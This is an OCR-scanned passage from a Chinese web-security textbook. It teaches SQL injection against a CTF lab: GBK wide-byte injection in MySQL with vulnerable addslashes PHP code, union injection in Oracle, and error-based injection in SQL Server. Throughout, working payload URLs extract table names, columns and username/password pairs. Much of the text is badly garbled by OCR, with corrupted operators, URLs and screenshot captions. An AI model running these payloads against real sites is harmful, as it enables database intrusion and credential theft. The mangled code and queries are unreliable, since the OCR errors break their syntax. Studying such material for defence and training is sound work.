http://ip/index.php? id- 1$81' and 1-2 union select l,group concat (table . 
name),3 from information schema.tables where table schema-0x6374667377696b692323 


(3) 查看 表 的 列 信息 。 例 如 : 
http://ip/index.php? id-1$ 81' and 1=2 union select l,group concat (column . 


name),3 from information schema.columns where table schema- 0x6374667377696b69 
and table name-0x75736572 $23 


CD 查看 列 的 值 。 例 如 : 


http://ip/index.php? id - 1$ 81 ' and 1- 2 union select 1, group concat 
(username, 0x2a2a2a, password),3 from user $23 


2. 宽 字 节 注入 示例 代码 
宽 字 节 注入 示例 代码 如 下 : 


$id=addslashes($ GET['id']); 
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mysql query("SET NAMES gbk"); 

$sql-"SELECT * FROM user WHERE id-'$id' LIMIT 0,1"; 
echo $sq1; 

$result-mysql query($sql); 


从 上 面 的 代码 中 可 以 看 出 ,程序 通过 addslashes 函数 对 $_GET['id'] 进 行 了 过 滤 , 会 
自动 对 传人 的 单 引号 等 字符 进行 转 义 。 但 是 ,后 面 通过 mysql_query 设置 数据 库 的 编码 
方式 为 GBK 编码 ,如 果 $_GET['id"] 传 人 的 第 一 个 字符 的 ASCII 码 大 于 128, 如 前 所 述 ， 
MySQL 数据 库 会 认为 前 两 个 字符 是 一 个 汉字 ,会 将 后 面 的 转 义 字符 \“ 吃 掉 ”, 将 前 两 个 
字符 拼接 为 汉字 ,造成 宽 字 节 注 入 。 

1) 获取 当前 数据 库 信 息 

输入 以 下 字符 型 注入 测试 语句 : 


http://192.168.91.142/sqli/02.php? id-1' and 1=2 union select 1, CONCAT WS 
(CHAR (32,58, 32) , user (),database(),version()),3 $23 


发 现 无 法 正常 获取 数据 库 信息 ,通过 输出 的 SQL 语句 信息 ,可 以 看 到 服务 器 端 执 行 的 
SQL 语句 为 SELECT x FROM user WHERE id —'1V' and 1 — 2 union select 1, 
CONCAT WS(CHAR(32,58,32) ,user() , database) , version )).3 #' LIMIT 0,1,40 
图 2-53 所 示 。 因 为 addslashes 将 输入 的 ' 转 义 为 \', 这 样 就 无 法 闭合 SQL 语句 ,输入 的 所 
有 SQL 语句 都 会 被 当 作 一 个 字符 串 ,无 法 正常 注入 。 


r7 168.91.142/sqli/02 php?id=1" and 122 union select 1.CONCAT WS(CHARG2 58 32),user() database() version(), 3 %23 


J Enable Post data [] Enable Referrer 


- 
此 网 站 中 集合 了 SQL 注 入 、 文 件 包含 、 合 令 执 行 、XXE、 反 序列 化 、SSRF、XSS、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 


MYSQL 竞 字 节 SQLI 
Index php?id-t 


SELECT * FROM user WHERE id-'tY and 1-2 union select 1,CONCAT. WS(CHAR(32.56,32) user().database() version()).3 # LIMIT 0,1 


ia name age 


1 usert passi 


OCIFS-WIKI 


2-583 单 引号 被 转 义 而 无 法 正常 注入 


利用 宽 字 节 注入 原理 ,只 要 第 一 个 字符 的 ASCII 码 大 于 128,MySQL 数据 库 就 会 认 
为 前 两 个 字符 是 一 个 汉字 ,可 以 正常 闭合 SQL 语句 进行 注入 ,这 样 就 可 以 用 ASCII 码 为 
129 的 字符 进行 注入 ,其 URL 编码 为 %81。 
输入 以 下 宽 字 节 注入 测试 语句 : 
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http://192.168.91.142/sq1i/02.php? id-1$81' and 1-2 union select 1,CONCAT WS 
(CHAR (32, 58, 32), user (),database(),version()),3 $23 


发 现 可 以 正常 获取 数据 库 的 信息 ,通过 输出 的 SQL 语句 信息 ,发 现 此 时 服务 器 端 执行 的 
SQL 语句 为 


SELECT * FROM user WHERE id-'1 Æ' and 1-2 union select 1, CONCAT WS (CHAR (32, 
58,32),user(), database(),version()),3 $' LIMIT 0,1 


由 于 使 用 的 是 GBK 编码 ,% 81 在 汉字 的 编码 范围 内 ,% 81 把 后 面 的 转 义 字符 
\CURL 编码 为 %5c)“ 吃 掉 ”, 组 成 了 一 个 汉字 “ 乘 ”, 成 功 地 闭合 了 前 面 的 单 引号 ,构造 了 
联合 查询 SQL 语句 ,获得 了 数据 库 的 信息 ,如 图 2-54 所 示 。 当 然 注入 的 第 一 个 字符 不 一 
定 是 %81, 只 要 是 大 于 %80, 在 汉字 的 编码 内 即 可 。 


htp/192.168.91,142/sq/02 phpTids VIGET and 152 union select 1.CONCAT_ WS(CHAR(G2 58.32) user( database versioni) 3 %23 


C Enable Post data [] Enable Referrer 


1 X ASTHA RALIS / REER RESTE IPTE 4 XEfG (SUE EH UR HE SREIG ASSER ORROA EnA 


ebiti egna 
Follow @ctfs-wiki 
index php?d-t 
SELECT * FROM user WHERE Ic-"HIF and 1=2 union select 1 CONCAT_WS(CHAR(32 58.32) user().database().version()).3 # LIMIT 0.1 
id name age 
1 ctswio@localhost ` cttsmki ` 5 + 73 3 
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图 2-54 获得 了 数据 库 的 信息 


2) 获取 数据 库 中 的 表 名 
输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/02.php? id-1$81' and 1-2 union select 1,group_ 
concat(table name),3 from information schema.tables where table schema- 
0x63746673177696b69$ 23 


获取 ctfswiki 数 据 库 中 存在 user, xss 两 个 表 , 如 图 2-55 所 示 。 此 处 table schema = 
0x6374667377696b69 为 什么 不 写 为 table_schema= 'ctfswiki'? 这 是 因为 单 引号 会 转 义 ， 
导致 语法 错误 ,所 以 不 能 用 单 引 号 的 形式 ,只 能 将 ctfswiki 字符 串 转换 为 十 六 进 制 ， 
MySQL 是 可 以 正常 处 理 十 六 进 制 的 ,所 以 可 以 用 table_schema =0x6374667377696b69 
代替 table_schema 一 'ctfswiki'。 

3) 获取 数据 库 表 中 的 列 名 

输入 以 下 测试 语句 : 
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tgi/192.168 01 142/91/02 phpTki=1%8T” and 1-2 union select 1 group concat table name) 3 from information schema tables whare table schema =0x6374657377606b60%23 


C Enable Post data [T Enable Referer 
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此 网 站 中 华 合 了 SQL 注入 、 文 件 包 合 、 命 令 执 行 、XXE、 反 序列 化 、SSRF、XSS、 文 件 上 传 等 党 见 的 Web 漏洞 环境 


Follow @ctfs-wiki 


MYSQL 宽 字 节 SQLI 


id name age 


ecrTrs-wa 


图 2-55 ctfswiki 数据 库 中 存在 user、xss 两 个 表 


http://192.168.91.142/sqli/02.php? id-1$ 81' and 1=2 union select l,group 
concat(column name), 3 from information schema.columns where table schema- 
0x6374667377696b69 and table name-0x75736572$23 


获取 ctfswiki 数据 库 user 表 中 存在 id username, password 这 3 个 列 ,如 图 2-56 所 示 。 


http /100 14/0 V02 php/id« WI and 1=2 umon select group. concetícolum name) 2 from information schema column where table achema= 0374867377695069 end table name =0x/5726572N23 


noble Post data C] Enable Referrer 


OM Home 
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此 网 站 中 集合 了 SQL 注 入 、 文 件 包 合 、 命 令 执 行 、XXE、 反 序列 化 、SSRF、XSS、 文 件 上 传 等 常见 的 web 漏 洞 环境 
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MYSQL 宽 字 节 SQLI 
Index phoist 
SELECT * FROM user WHERE X 1«2 union seiect 1 group concatcolum rame) 3 trom niomraton_ schema columns where tabe. schema=0x637466737: 
table_name-0x75736572# LM 
m name age 
1 Hsemame passnord 3 


图 2-56 user 表 中 存在 id username, password 这 3 个 列 
4) 获取 列 中 的 数据 
输入 以 下 测试 语句 : 


http://192.168.91.142/sq1i/02.php? id-1$81' and 1-2 union select 1,group_ 
concat (username, 0x2a2a2a,password),3 from user$23 


从 user 表 中 取出 username 列 和 password 列 中 的 数据 ,得 到 userl, passl 等 多 个 用 户 名 
和 密码 信息 ,如 图 2-57 所 示 。 
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Rep SE TESST AD aUa ck d= RET and 1=2 uron select T,əroup zoncatiusdmem 0z2a2a2a password) 3 from uae 


l Enable post data L] Enable Referrer 


bapa o — À—À—— 


ËtiplatrF3E Y SQLILA. MHES, WORF. XXE. EFFIE. SSRF. XSS. X fS SERIE webiRE Raids 


Follow @ctfs-wiki 
MYSQL 竞 字 节 SQLI 


SELECT * FROM user WHERE id-'1@\ and 1-2 union select 1 group cof 
id name 


ncat(username 01232222 password) 3 from usen LIMIT 0.1 


1 — useri""'passi user2^"'pass? usero**tpass? user4""*pass4 user5'""pass5 usert"""passt userT""*passT user8™pass3 E 
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图 2-57 得 到 userl.passl 等 多 个 用 户 名 和 密码 信息 


2 5 Oracle 注入 


结构 的 数据 库 之 一 。 图 2-58 是 甲骨 文 的 标识 。 


Oracle 是 甲骨 文公 司 发 布 的 关系 数据 库 管 理 系统 ,是 目前 最 流行 的 C/S 或 B/S 体系 


2.5. Oracle 基础 知识 ES. 
a E&E Sx 

1. 数据 字典 和 数据 字典 视图 

1) 数据 字典 图 2-58 甲骨 文 的 标识 


数据 字典 是 元 数据 的 集合 ,从 逻辑 上 和 物理 上 描述 了 数据 库 及 其 内 容 , 存 储 于 


SYSTEM 与 SYSAUX 表 空 间 内 的 若干 段 中 。 


2) 数据 字典 视图 
数据 字典 中 的 数据 比较 复杂 ,一 般 查询 的 是 数据 字典 视图 。 数 据 字 典 视图 有 3 个 不 


同 权 限 的 分 类 ,分 别 以 user、all、dba 的 前 级 开头 。 


下 面 介 绍 最 常用 的 3 个 数据 字典 视图 。 
(D user tables 表 。 


user tables 表 中 存储 了 用 户 拥有 的 表 的 信息 ,其 作用 类 似 于 MySQL 的 information 


schema 数据 库 中 的 tables 表 。 


通过 select table name,tablespace name from user tables 可 以 获取 CTFS 用 户 的 表 


空间 中 存储 了 user 和 user2 两 个 表 , 如 图 2-59 所 示 。 


(2) user tab columns X, 


user tab columns 表 中 存储 了 用 户 拥 有 的 列 的 信息 ,其 作用 类 似 于 MySQL 的 


information schema 数据 库 中 的 columns 表 。 
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SQL» select table name,tablespace name from user tables; 


TABLE NAME TABLESPACE NAME 
user CTFS 
user2 CTFS 


图 2-59 CTFS 用 户 的 表 空 间 中 存储 了 user 和 user? 两 个 表 


通过 select table_name,column_name from user_tab_columns 可 以 查询 到 当前 用 户 
存储 的 表 user 和 user? 及 表 中 的 列 id, username, password 的 信息 ,如 图 2-60 所 示 。 


select table name,column name from user tab columns; 


'ABLE NAME COLUMN NAME 


user username 
ser password 
ser2 id 

user2 username 
ser2 password 


上 6 rows selected. 


图 2-60 ”当前 用 户 存储 的 表 和 列 信息 


(3) dual €, 

dual 表 是 Oracle 数据 库 中 实际 存在 的 表 , 任 何 用 户 均 可 读 取 ,常用 在 Oracle 注入 中 
没有 目标 表 的 select 语句 块 中 。 

通过 select S YS CONTEXT(CUSERENV', 'CURRENT USER? from dual 查询 到 
当前 的 用 户 信息 为 CTFS, 如 图 2-61 所 示 。 


[SQL> select SYS CONTEXT ('USERENV', 'CURRENT USER')from dual; 


ISYS CONTEXT (' ,'CURRENT USER') 


2-61 查询 到 当前 的 用 户 信息 为 CTFS 


2. union 的 作用 和 语法 

union 用 于 合并 两 个 或 多 个 select 语句 的 结果 集 ,并 消去 表 中 的 所 有 重复 行 。 

注意 : 联合 查询 中 合并 的 选择 查询 必须 具有 相同 的 输出 字段 数 、 采 用 相同 的 顺序 并 
包含 相同 的 数据 类 型 ,如 果 数 据 类 型 不 同 会 报错 。 在 SQL 注入 中 通常 用 select null from 
dual 来 避免 不 同 数据 类 型 的 报错 。 

union 的 语法 如 下 : 


SELECT column name FROM tablelunion SELECT column name FROM table2 


如 果 数 据 类 型 不 同 就 会 报错 , H EL" ORA-01790; expression must have same 
datatype as corresponding expression" f] dt zr ,如 图 2-62 所 示 。 
利用 null 可 以 避免 数据 类 型 不 同 产生 的 报错 ,可 以 正常 地 使 用 union 联合 查询 获取 
数据 信息 ,通过 union 联合 查询 ,将 前 后 两 个 结果 集 的 数据 合并 到 一 个 结果 集中 ,如 图 2-63 
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所 示 。 


[SQL> select table name,column name from user tab columns union select 1,2 from dual; 
select table name,column name from user tab columns union select 1,2 from dual 
* 


ERROR at line 1: 
ORA-01790: expression must have same datatype as corresponding expression 


图 2-62 数据 类 型 不 同 的 报错 信息 


SQL» select table name,column name from user tab columns union select null,null from dualj 


user password 
user username 
user2 id 

user2 password 
user2 username 


7 rows selected. 


图 2-63 利用 null 避免 数据 类 型 不 同 产生 的 报错 


3. order by 子 句 的 作用 和 语法 

order by 子 句 按 一 个 或 多 个 字段 对 查询 结果 排序 ,可 以 是 升序 也 可 以 是 降序 ,默认 是 
升序 。order by 子 句 通常 放 在 SQL 语句 的 最 后 。 

在 order by 子 句 中 可 以 用 字段 在 选择 列表 中 的 位 置 号 代替 字段 名 。 

因为 table name 是 第 一 列 ,可 以 用 1 代替 ,所 以 order by table name 5j order by 1 
是 完全 一 样 的 ,如 图 2-64 和 图 2-65 所 示 。 


SQL» select table name, column name from user tab columns order by table name; 
ITABLE NAME COLUMN NAME 

user id 

user username 

user password 

user2 id 

user2 username 

user2 password 

& rows selected. 


图 2-64 order by 查询 根据 table name 进行 排序 


SQL» select table name,column name from user tab columns order by | 


"TABLE NAME COLUMN NAME 


user username 
user password 
juser2 id 

user2 username 
user2 password 


6 rows selected. 


2-65 order by 查询 根据 序号 1 进行 排序 


83 


mem Web 安全 原理 分 析 与 实践 


2.5.2 Oracle 注入 示例 代码 分 析 


1. Oracle 注入 payload 
Oracle 注入 payload 如 下 : 
CD 判断 注入 点 。 例 如 : 


http://192.168.91.142:8080/index.jsp?id-1 and 1-1 


(2) 判断 列 数 。 例 如 : 


http://192.168.91.142:8080/index.jsp?id=1 order by 1 


(3) 判断 报错 点 。 例 如 : 


http://192.168. 91. 142: 8080/index. jsp? id= 1 union select null, null, null 
from dual 


(4) 获取 当前 数据 库 名 。 例 如 : 


http://192. 168. 91. 142: 8080/index. jsp? id- 1 union select null, null, SYS _ 
CONTEXT ('USERENV', 'CURRENT USER') from dual 


(5) 获取 数据 库 中 的 表 名 。 例 如 : 


http://192.168.91.142:8080/index.jsp? id- 1 and 1=2 union select null,null, 
table name from user tables 


(6) 获取 表 中 的 列 名 。 例 如 : 


http://192.168.91.142:8080/index.jsp?id-1 and 1=2 union select null, null, 
column name from user tab columns 


(7) 获取 列 中 的 数据 。 例 如 : 


http://192.168.91.142:8080/index.jsp?id-1 and 1-2 union select null, 
"username","password" from "user" 


2. Oracle 注入 过 程 
D 判断 注入 点 
输入 单 引 号 ,数据 库 会 报错 ,说 明 此 网 站 没有 对 单 引号 进行 过 滤 并 且 与 Oracle 数据 


库存 在 交互 查询 ,可 能 存在 SQL 注入 漏洞 ,如 图 2-66 所 示 。 
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输入 “and 1 二 1”, 页 面 正 常 返回 ,如 图 2-67 所 示 。 
输入 “and 1 一 2”, 页 面 不 正常 返回 ,如 图 2-68 所 示 。 
通过 上 面 两 个 测试 语句 ,基本 可 以 判断 此 网 站 存在 数字 型 注入 漏洞 。 
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http//192.16: 


C Enable Post data [ ] Enable Referrer 
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此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 令 执 行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 
ORACLE SQL 


Java sql SQL Exception: ORA-01756: quoted string not property terminated. 
OCTFS-WKI 


2-66 输入 单 引号 时 数据 库 会 报错 


http//192.168.91.142:8080/indexjsp7id=1 and 1=1 


口 Enable Post data Enable Referrer 
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此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctfs-wiki 


ORACLE SQL 
id username password 
1 useri passi 
图 2-67 页 面 正 常 返回 (6) 
2) 判断 列 数 


要 用 联合 查询 注入 ,两 个 结果 集 的 列 数 要 相同 ,数据 类 型 也 要 相同 ,所 以 要 首先 判断 
index. jsp?id 一 1 这 个 语句 在 数据 库 中 返回 几 列 。 因 为 可 以 用 字段 在 选择 列表 中 的 位 置 
号 代替 字段 名 ,所 以 可 以 用 order by 1 来 判断 。 用 二 分 法 可 以 很 快 得 出 结果 。 

输入 以 下 测试 语句 : 


http://192.168.91.142:8080/index.jsp?id-1 order by 1 


页 面 正常 返回 ,如 图 2-69 所 示 , 说 明 返 回 结果 集 至 少 为 1 列 。 
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hp:/7192:168311428080/dexjspAid- T and T 


口 Enable Post data [] Enable Referrer 


CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 


化 、SSRF、 文 件 上 传 等 常见 的 web 汤 洞 环 境 


Follow @ctfs-wiki 
ORACLE SQL 


©CcTFS 


2-68 页 面 不 正常 返回 (6) 


httg./192:16891.1428080/indexjsp ids 1 order by 1 


C Enable Post data [] Enable Referrer 


CTFS-WIKI 
命令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 


Follow @ctfs-wiki 


ORACLE SQL 
id username password 
usert passt 


图 2-69 页 面 正常 返回 (7) 


输入 以 下 测试 语句 : 


http://192.168.91.142:8080/index.jsp?id-1 order by 4 


页 面 不 正常 返回 ,如 图 2-70 所 示 ,说 明 返回 结果 集 小 于 4 列 。 
输入 以 下 测试 语句 : 


http://192.168.91.142:8080/index.jsp?id-1 order by 3 


页 面 正常 返回 ,如 图 2-71 所 示 , 说 明 返 回 结果 集 至 少 为 3 列 。 
经 过 上 面 的 测试 发 现 返回 的 结果 集 至 少 为 3 列 , 但 是 小 于 4 列 ,所 以 结果 集 为 3 列 。 
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http//192-168.97.142:8080/ndexjspid=1 order by d| 


[ Enable Post data [J Enable Reierrer 


Gmm 
CTFS-WIKI 


此 网 站 中 集合 了 SQL 注 入 、 文 件 包含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 汤 洞 环境 


Follow @ctfs-wiki 
ORACLE SQL 


Java sql. SQL Exception: ORA-01785: ORDER BY item must be the number of a SELECT-list expression 
© CTFS-WIK 


图 2-70 页 面 不 正常 返回 (7) 


0 0 


口 Enable Postdata [ E 


EE 
CTFS-WIKI 


此 网 站 中 集合 了 SQL 注 入 、 文 件 包 含 、 命 令 执 行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 汤 洞 环 境 


lo Referrer 


Follow @ctfs-wiki 


ORACLE SQL 


index jsp?id-1 


ia username password 


1 usert pass1 


O CTFSWK 


图 2-71 页 面 正 常 返回 (8) 


由 此 确定 联合 查询 返回 的 结果 集 的 列 数 为 3。 
3) 获取 当前 数据 库 的 常见 信息 
CD 查看 当前 用 户 的 信息 : 


select SYS CONTEXT('USERENV', CURRENT USER') from dual 
(2) 查看 当前 用 户 权限 : 
select * from session roles 


(3) 查看 数据 库 版 本 : 


select banner from sys.v $version where rownum-1 
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4) 获取 当前 用 户 信 息 
输入 以 下 测试 语句 : 


http://192.168. 91. 142: 8080/index. jsp? id- 1 union select null, null, SYS _ 
CONTEXT ('USERENV', 'CURRENT USER') from dual 


获取 当前 用 户 为 CTFS, 如 图 2-72 所 示 。 


hepy/192 168.91.142.8080/index jsp7id=1 union select null nll SYS_ CONTEXT TUSERENV "CURRENT USER from dual 


C Enable Post data [C] Enable Referrer 


| — T) 
CTFS-WIKI 


Wt EPIRÉTSQUEIA. KAIS., $91. EFIE. SSRF. KLERE L6 web vs 


Follow @ctfs-wiki 


ORACLE SQL 
—92 
ia vsername password 
1 useri pass 
w username password 
° nuli CTFS 
@cTFS ww 


图 2-72 返回 当前 用 户 信息 


5) 获取 当前 用 户 的 表 信 息 
输入 以 下 测试 语句 : 


http://192.168.91.142:8080/index.jsp?id=1 and 1=2 union select null,null, 
table name from user tables 


获取 当前 用 户 有 user 和 user2 两 个 表 , 如 图 2-73 所 示 。 
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6) 获取 当前 用 户 的 表 中 的 列 信息 
输入 以 下 测试 语句 : 


http://192.168.91.142:8080/index.jsp? id-1 and 1-2 union select null, null, 
column name from user tab columns 


获取 当前 用 户 的 user 表 中 存在 id username, password 这 3 列 ,如 图 2-74 所 示 。 
7) 获取 当前 用 户 的 表 中 username 和 password 的 数据 
输入 以 下 测试 语句 : 
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Httgi//192:168,81.142:6080/index jepTid- 1 and 1-2 union select null null table name from user tables 


[ Enable Post data [ ] Enable Referrer z 
CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包 合 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 


Follow @ctts-wiki 


ORACLE SQL 


index jsp?id-* 
id username password 
° null user 
id username password 
° null vser2 
OCTFS-WII 


图 2-73 返回 user 和 user2 表 信息 


http://192.168.91.142:8080/index.sp?id=1 and 1=2 union select null,null,column_name from user tab column 


口 Enable Post data 口 Enable Referer 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 


Follow @ctfs-wiki 


ORACLE SQL 


index jsp?id-1 
id username password 
° nuit id 
id username password 
° null password 
id username password 
° nuit username 
C CTFS-W 


图 2-74 返回 id username, password 列 信息 


http://192.168.91.142:8080/index.jsp?id-1 and 1-2 union select null, 


"username","password" from "user" 
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这 样 就 获取 了 列 中 的 数据 userl、passl 等 ,如 图 2-75 所 示 。 


Mp/ 92 16 91.1 450000 /rdfP Td and 12 union select nuiusemams" password" From "user 
口 Enable Post data [] Enable Referrer 
此 网 站 中 集合 了 SQL 注入 、 文 件 包 含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 漏 洞 环境 
Follow @ctfs-wiki 
/ndexisp?id-t 
id username. password. 
o usert pass1 
id username password 
° vserz pass2 
id username password 
° users passa 
id username password 
° users "T" 


图 2-75 返回 userl, pass] 等 数据 


注意 : Oracle 会 自动 将 小 写字 母 转换 为 大 写字 母 , 所 以 要 用 双 引 号 ,防止 自动 转换 。 


2:6 SQL Server 注入 


SQL Server 是 微软 公司 推出 的 关系 型 数据 库 管理 系统 ,具有 使 用 方便 、 可 伸缩 性 好 、 
与 相关 软件 集成 程度 高 等 优点 。 图 2-76 为 SQL Server 2008 
的 标识 。 

SQL Server 是 一 个 全 面 的 数据 库 平台 ,使 用 集成 的 商业 O €. 
智能 工具 ,提供 了 企业 级 的 数据 管理 功能 。SQL Server 数据 SQL Server2008 
库 引擎 为 关系 型 数据 和 结构 化 数据 提供 了 更 安全 可 靠 的 存储 ,7。 SQL Server 2008 
功能 ,可 以 构建 和 管理 高 可 用 和 高 性 能 的 数据 库 应 用 程序 。 Va a 


2.6.1 SQL Server 目录 视图 


SQL Server 引入 了 一 组 目录 视图 作为 保留 系统 元 数据 的 通用 接口 。 所 有 目录 视图 
(包括 动态 管理 对 象 和 兼容 性 视图 ) 都 在 sys 模式 中 。 访 问 对 象 时 ,必须 引入 模式 名 称 。 
SQL Server 包含 sysdatabases,sysobjects, syscolumns 3 个 目录 视图 。 


1. sysdatabases 
sysdatabases 中 保存 了 与 数据 库 相 关 的 信息 。 最 初 安装 SQL Server 时 ,sysdatabases 包 
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š master,model,msdb, mssqlweb 和 tempdb 数据 库 的 项 。sysdatabases 中 的 信息 存储 在 
master 数据 库 中 。 
select * from sysdatabases 查询 的 结果 就 是 所 有 数据 库 的 名 称 , 如 图 2-77 所 示 。 


[1 | 1 NULL 0:01 
[2 |temdb 2 NULL 001 
[3 |mde |3 NULL 0:01 
[4 nb 4 NULL 001 
EN sc ‘5 NULL 0x010500000000000515000000B42C1FECF288C5FBB3732F... 


2-77 查询 到 所 有 数据 库 的 名 称 


2. sysobjects 

sysobjects 中 保存 了 每 个 数据 库 内 创建 的 所 有 对 象 ,如 约束 、 默 认 值 .日 志 、 规 则 、 存 
储 过 程 等 ,每 个 对 象 在 sysobjects 中 占 一 行 。 

select * from sec. dbo. sysobjects where xtype 二 'U' 查 询 的 结果 就 是 sec 数据 库 中 所 
有 用 户 的 表 名 ,如 图 2-78 所 示 。 其 中 ,name、id、xtype、uid 和 status 分 别 是 对 象 名 、 对 象 
ID、 对 象 类 型 .对象 所 有 者 的 用 户 ID 和 对 象 状态 。 


21575115 
37575172 
eims_DownPro 53575229 
[| eims DownSort 69575286 
eims ob. 85575343 
|Z | eims Flach 101575400 
[8 | eims Fink 117575457 
[S | eims GBook 133575514 
[10] eim Job 149575571 
[| ems Menu 165575628 
eims News 181575685 
[13 | eims_NewsPro 197575742 
eim, NewsSort 213575798 
[15 | eims Notice. 229575856 
[16 | ems Order 245575913 
[Z] eims Product 261575370 
8. [| em PoducPo 277576027 


cl|c|clclclclclclclclcljclclclc|c|c|c 国 
olooocooococoooooocooocsos|r 
oloocooococoocooocoooco 
ooooooooooooooooo o| 
oooooooooooooooooo 
Ira 


2-78 查询 到 sec 数据 库 中 所 有 用 户 的 表 名 


3. syscolumns 

syscolumns 用 于 保存 列 名 。 每 个 表 和 视图 中 的 每 一 列 在 syscolumns 中 占 一 行 , 存 储 
过 程 中 的 每 个 参数 在 syscolumns 中 也 占 一 行 。 该 目录 视图 位 于 每 个 数据 库 中 。 主 要 字 
BA name、\id 和 colid, 分 别 是 字段 名 、 表 ID 号 和 字段 ID 号 ,其 中 的 id 与 sysobjects 中 的 
id 相同 。 

select * from sec. dbo. syscolumns 可 以 查询 到 sec 数据 库 中 所 有 表 和 视图 的 列 名 ， 
如 图 2-79 所 示 。 
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2-79 查询 到 sec 数据 库 中 所 有 表 和 视图 的 列 名 


2.6.2 SQL Server 报错 注入 


1. SQL Server 报错 注入 payload 

SQL Server 报错 注入 payload 如 下 : 

(1) 获取 当前 数据 库 名 。 有 两 种 报错 注入 的 方式 可 以 获取 数据 库 的 名 称 。 
第 一 种 方式 是 通过 sys. databases 表 获 取 。 例 如 : 


http://www.ctfs - wiki.com/News.asp? SortID- l&ItemID- 46 and (select top 1 
name from sys.databases) >0 


第 二 种 方式 是 通过 db name 函数 获取 。db_name 是 sql server 的 内 置 函数 ,可 以 查 


询 当前 数据 库 的 名 称 ,然后 与 0 比较 以 产生 类 型 比较 报错 ,获取 数据 库 信息 。 例 如 
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http://www.ctfs-wiki.com/News.asp?SortID=1&ItemID=46 and db name()»0 


(2) 获取 数据 库 中 的 表 名 。 例 如 : 


http://www.ctfs-wiki.com/News .asp?SortID=1&ItemID=46 and 0< (select top 1 
name from sec.dbo.sysobjects where xtype- 'U') 


(3) 获取 数据 库 中 表 中 的 列 名 。 例 如 : 


http://www.ctfs-wiki.com/News.asp? SortID- l&ItemID- 46 and 0< (select top 1 
name from sec.dbo.syscolumns where id- (select id from sec.dbo.sysobjects 
where xtype- 'U' and name-'eims User')) 


(4) 获取 数据 库 列 中 的 数据 。 例 如 : 


http://www.ctfs-wiki.com/News .asp?SortID=1&ItemID=46 and 0< (select top 1 
iteml from sec.dbo.eims User) 


m— Ñ SQLŻARA mem 


2. SQL Server 报错 注入 步骤 

1) 获取 当前 数据 库 名 

有 两 种 报错 注入 的 方式 可 以 获取 数据 库 的 名 称 。 
第 一 种 方式 是 通过 databases 表 获 取 。 
输入 以 下 测试 语句 : 


http://www.ctfs - wiki.com/News.asp? SortID- l&ItemID- 46 and (select top 1 
name from sys.databases)»0 


将 查询 的 结果 与 0 比较 ,产生 类 型 比较 报错 ,得 到 存在 master 数据 库 的 信息 ,如 图 2-80 
所 示 。 


Hg) Load URL [http://www.ctfs-wiki.com/News.asp?SortID=1&ItemlD=46 and (select top 1 name from sys.databases) >0 


Ü Split URL 
+) Execute 


Enable Post data Enable Referrer 


Microsoft OLE DB Provider for SQL Server 错误 '80040e07" 


在 将 nvarchar (Í master | tratta int 时 失败 。 


图 2-80 返回 master 数据 库 报错 信息 


第 二 种 方式 是 通过 db name 函数 获取 。 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/News.asp?SortID-1&ItemID-46 and db name()»0 


得 到 当前 数据 库 sec 的 信息 ,如 图 2-81 所 示 。 


WE) LoadURL  |http;//www.ctfs-wiki.com/News.asp?SortID- 1&ltemID -46 and db_name0>0 
Ñ SpltuR. 
(9) Execute 


Enable Post data Enable Referrer 


Microsoft OLE DB Provider for SQL Server fHi& '80040e07" 


在 将 nvarchar f [sec ] 转换 成 数据 类 型 int 时 失败 。 


2-81 返回 sec 数据库 报错 信息 


2) 获取 数据 库 中 的 表 名 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/News .asp?SortID=1&ItemID=46 and 0< (select top 1 
name from sec.dbo.sysobjects where xtype- 'U') 
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从 查询 name 列 的 第 一 个 结果 中 获取 了 sec 数据 库 中 的 第 一 个 表 为 eims_CasePro 的 信 
息 ,xtype 一 '"U 表 示 用 户 表 ,xtype 一 'S 表 示 系 统 表 , 如 图 2-82 所 示 。 


Load URL  http;//www.ctfs-wikicom/News.asp?SortID- 1&ltemID -46 and 0<(select top 1 name from sec.dbo.sysobjects where xtype="U') 


SET] 


L] Enable Post data [ ] Enable Referrer 


Microsoft OLE DB Provider for SQL Server 错误 '80040e07" 


在 将 nvarchar (Ë 'eims CasePro' AMARAT int 时 失败 。 


图 2-82 返回 eims_CasePro 表 报 错 信息 
输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/News.asp?SortID=1&ItemID=46 and 0< (select top 1 
name from sec.dbo.sysobjects where xtype- 'U' and name not in ('eims CasePro')) 


从 查询 name 列 的 结果 中 获取 了 sec 数据 库 中 的 第 二 个 表 为 eims. CaseSort 的 信息 ,如 
图 2-83 所 示 。 


Load URL [http /vewew.ctfs-wikicom/News.asp?SortID.- T&ltemiD =46 and 0<(select top 1 name from sec.dbo.sysobjects where xtype'U' and name not in ('eims Casepro) 
Split URL 
®© Execute 


[ Enable Post data [ ] Enable Referrer 


Microsoft OLE DB Provider for SQL Server 描 误 “80040e07 
TEW nvarchar 值 'eims_CaseSort” 转 换 成 数据 类 型 int 时 失败 。 


|/eius cus 3. 5/Config.asp: ff 23 


图 2-83 返回 eims | CaseSort 表 报 错 信 息 


输入 以 下 测试 语句 : 


http://www.ctfs-wiki.com/News .asp?SortID=1&ItemID=46 and 0< (select top 1 
name from sec.dbo.sysobjects where xtype- 'U' and name not in ('eims CasePro', 
'eims CaseSort')) 


